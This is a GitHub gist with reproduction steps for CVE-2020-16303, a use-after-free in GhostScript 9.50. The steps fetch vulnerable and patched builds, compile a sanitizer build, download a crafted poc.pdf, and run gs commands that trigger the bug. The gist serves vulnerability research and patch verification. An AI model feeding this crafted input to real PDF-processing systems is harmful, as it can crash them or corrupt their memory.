- Download GhostScript GhostPDL v9.50 from their GitHub release.
- Need to download both the official build and the source code.
- Official build (without fix):
wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs950/ghostscript-9.50-linux-x86_64.tgz
. - Official build (with fix):
wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs951/ghostscript-9.51-linux-x86_64.tgz
.
- Compile from source code in the following steps:
- Get the source code
git clone git@github.com:ArtifexSoftware/ghostpdl.git
. - Change to the correct version
git checkout b5bc53eb7
. - Make sure you have installed gcc, make and autoconf.
sudo apt install gcc
sudo apt install make
sudo apt install autoconf
- Run
./autogen.sh
. - Run
make sanitize
. - The build target would be in
sanbin
folder.
- Get the source code
- Download the crafted input file
poc.pdf
from this page.- Run
wget https://gist.githubusercontent.com/yunpengn/2a997a30ea798c2a2f1ac2fc89d31106/raw/0296f78472ab6da2f296ab7a0584e47cebd08d74/poc.pdf
.
- Run
- Run the command to simulate the vulnerability:
./gs -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp -sDEVICE=xpswrite ./poc.pdf
./gs-debug -dBATCH -dDEBUG -dNOPAUSE -dSAFER -dNOTRANSPARENCY -dPDFSTOPONERROR -sOutputFile=tmp -sDEVICE=xpswrite ./poc.pdf
./gs-san -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp-san -sDEVICE=xpswrite ./poc.pdf
./gs-fix -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp-fix -sDEVICE=xpswrite ./poc.pdf
Last active
September 24, 2021 14:24
-
-
Save yunpengn/2a997a30ea798c2a2f1ac2fc89d31106 to your computer and use it in GitHub Desktop.
CVE-2020-16303 use-after-free vulnerability in Artifex Software GhostScript v9.50
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment